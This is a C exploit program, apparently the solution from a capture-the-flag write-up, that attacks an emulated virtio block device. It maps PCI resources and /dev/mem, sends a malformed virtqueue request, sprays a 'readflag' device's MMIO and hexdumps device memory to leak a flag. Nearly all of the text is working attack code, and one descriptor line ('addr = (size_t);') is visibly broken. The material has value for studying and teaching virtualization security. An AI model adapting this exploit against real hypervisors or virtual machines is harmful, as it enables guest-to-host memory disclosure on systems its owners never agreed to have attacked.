volatile struct virtq_used* queue_used = NULL;

void init_readflag(){
int mmio_fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
if(mmio_fd < 0){
ERR("Open readflag");
}
readflag_mmio = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
if(readflag_mmio == (volatile void*)-1){
ERR("mmap mmio_mem");
}
close(mmio_fd);

puts("readflag init done");
}

uint8_t mmio_read8(void* addr){
return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
*(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
*(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
*(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
*(volatile uint64_t*)addr = val;
}

void mb(){
asm volatile("mfence":::"memory");
}

void init_virtio() {
int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
if(fd < 0){
ERR("Open virtio config");
}
struct virtio_pci_cap cap;
char* config = malloc(0x1000);
int bytes_read = read(fd, config, 0x1000);
if(bytes_read < 0){
ERR("Read virtio config");
}

fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
if(fd < 0){
ERR("Open virtio resource4");
}
virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if(virtio_mmio == (volatile void*)-1){
ERR("mmap virtio mem");
}
close(fd);

u8 cap_ptr = *(u8*)(config+0x34);
while(cap_ptr != 0){
if(config[cap_ptr] != 0x9){
cap_ptr = *(u8*)(config+cap_ptr+1);
continue;
}
memcpy(&cap, config+cap_ptr, sizeof(cap));
print_cap(&cap);
switch(cap.cfg_type){
case VIRTIO_PCI_CAP_COMMON_CFG:
virtio_common_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_NOTIFY_CFG:
virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
break;
case VIRTIO_PCI_CAP_ISR_CFG:
virtio_isr_mmio = virtio_mmio + cap.offset;
break;
case VIRTIO_PCI_CAP_DEVICE_CFG:
virtio_device_mmio = virtio_mmio + cap.offset;
break;
default:
break;
}
cap_ptr = cap.cap_next;
}
close(fd);
free(config);

struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
mmio_write32(&common_cfg->device_feature_select, 0);
printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->device_feature_select, 1);
printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
mmio_write32(&common_cfg->driver_feature_select, 0);
printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
mmio_write32(&common_cfg->driver_feature_select, 1);
printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

// reset device
mmio_write8(&common_cfg->device_status, 0);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
mmio_write32(&common_cfg->driver_feature_select, 0);
mmio_write32(&common_cfg->driver_feature, 0); // disable all features
mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


// alloc dma memory
int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
if(dma_fd < 0){
ERR("Open dma");
}
dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
if(dma_mem == (volatile void*)-1){
ERR("mmap dma mem");
}
*(volatile uint32_t*)dma_mem = 0x12345678;
printf("%x\n", *(volatile uint32_t*)dma_mem);
*(volatile uint32_t*)dma_mem = 0;
printf("dma_mem: %p\n", dma_mem);
dma_data = dma_mem + 0x1000;
queue_desc = (struct virtq_desc*)dma_mem;
queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

// init queue
mmio_write16(&common_cfg->queue_select, 0);
mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
mmio_write16(&common_cfg->queue_enable, 1);

mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
puts("virtio init done");
}

void spray(){
for(int i = 0xfff; i > 0x28; i-=4){
mmio_write32((void*)readflag_mmio, i);
}
}

void hexdump(void* addr, size_t size){
// dump 4 bytes per time
for(int i = 0; i < size; i+=4){
uint32_t val = *(volatile uint32_t*)(addr+i);
for(int j = 0; j < 4; j++){
uint8_t chr = (val >> (j*8)) & 0xff;
if(chr >= 0x20 && chr <= 0x7e){
putchar(chr);
}else{
putchar('?');
}
}
}
}

int main(){
setbuf(stdout, NULL);
init_readflag();
init_virtio();

volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
req->type = 0xffffffffu;
req->sector = 0;
req->reserved = 0;

queue_desc[0].addr = (size_t)req;
queue_desc[0].len = 0x10;
queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
queue_desc[0].next = 1;
queue_desc[1].addr = (size_t);
queue_desc[1].len = 0xfff;
queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
queue_desc[1].next = 2;
queue_desc[2].addr = (size_t)dma_data + 0xa00;
queue_desc[2].len = 1;
queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
queue_desc[2].next = 0;

queue_avail->flags = 1;
queue_avail->ring[0] = 0;
queue_avail->idx = 1;
mb();
mmio_write8((void*)virtio_isr_mmio, 1);
struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
puts("--------------------------------");
for(int i = 0; i < 0x100; i+=4){
spray();
}
mmio_write16(notify_addr, 0);
puts("--------------------------------");
hexdump((char*)virtio_common_mmio + 0x000, 0x100);

munmap(dma_mem, 0x3000);
munmap(virtio_mmio, 0x4000);
munmap(readflag_mmio, 0x1000);
}

References


  1. Virtual I/O Device (VIRTIO) Version 1.1↩︎

  2. Virtqueues and virtio ring: How the data travels↩︎

  3. Memory-mapped I/O and port-mapped I/O↩︎